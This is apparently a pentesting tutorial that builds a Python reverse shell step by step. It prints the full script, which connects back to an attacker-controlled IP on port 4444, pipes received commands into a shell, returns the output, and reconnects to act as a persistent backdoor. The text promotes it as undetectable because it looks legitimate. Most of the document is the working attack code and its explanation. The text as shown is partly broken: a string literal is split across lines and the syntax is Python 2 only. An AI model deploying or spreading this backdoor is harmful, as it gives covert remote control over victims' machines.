The following script we're going to create leverages the use of raw sockets to exfiltrate data from a network. The general idea of this shell is to create a connection between the compromised machine and your own machine through a Netcat (or other program) session and send commands to the machine this way.
The beauty of this Python script is the undetectable nature of it, as it appears as a completely legitimate script.
This is the script that will establish a connection through Netcat and read the input:
import socket
import subprocess
import sys
import time
HOST = '172.16.0.2' # Your attacking machine to connect back to
PORT = 4444 # The port your attacking machine is listening on
def connect((host, port)):
go = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
go.connect((host, port))
return go
def wait(go):
data = go.recv(1024)
if data == "exit
":
go.close()
sys.exit(0)
elif len(data)==0:
return True
else:
p = subprocess.Popen(data, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
stdout = p.stdout.read() + p.stderr.read()
go.send(stdout)
return False
def main():
while True:
dead=False
try:
go=connect((HOST,PORT))
while not dead:
dead=wait(go)
go.close()
except socket.error:
pass
time.sleep(2)
if __name__ == "__main__":
sys.exit(main())To start the script as normal, we need to import our modules that will be used throughout the script:
import socket import subprocess import sys import time
We then need to define our variables: these values are the IP and port of the attacking machine to establish a connection with:
HOST = '172.16.0.2' # Your attacking machine to connect back to PORT = 4444 # The port your attacking machine is listening on
We then move on to defining the original connection; we can then assign a value to our established value and refer to this later on to read the input and send the standard output.
We refer back to the host and port value that we previously set and create the connection. We assign the established connection the value of go:
def connect((host, port)): go = socket.socket(socket.AF_INET, socket.SOCK_STREAM) go.connect((host, port)) return go
We can then introduce the block of code that will do the waiting portion for us. This will be awaiting commands to be sent to it through the attacking machine's Netcat session. We ensure that data that gets sent through the session is piped into the shell and the standard output of this is then returned to us through the established Netcat session, thus giving us shell access through our reverse connection.
We give the name data to the values that are passed to the compromised machine through the Netcat session. A value is added to the script to exit the session when the user is done; we've chosen exit for this, which means entering exit into our Netcat session will terminate the established connection. We then get down to the nitty gritty parts in which the data is opened (read) and piped into the shell for us. Once this has been done, we ensure the stdout value is read and given a value of stdout (this could be anything), which we then send back to ourselves via the go session that we established earlier. The code is as follows:
def wait(go):
data = go.recv(1024)
if data == "exit
":
go.close()
sys.exit(0)
elif len(data)==0:
return True
else:
p = subprocess.Popen(data, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
stdout = p.stdout.read() + p.stderr.read()
go.send(stdout)
return FalseThe final portion of our script is our error-checking and running portion. Before the script runs, we make sure we let Python know that we have a mechanism in place to check whether the session is active by using our previous true statement. If the connection is lost, the Python script will attempt to re-establish a connection with the attacking machine, making it a persistent backdoor:
def main():
while True:
dead=False
try:
go=connect((HOST,PORT))
while not dead:
dead=wait(go)
go.close()
except socket.error:
pass
time.sleep(2)
if __name__ == "__main__":
sys.exit(main())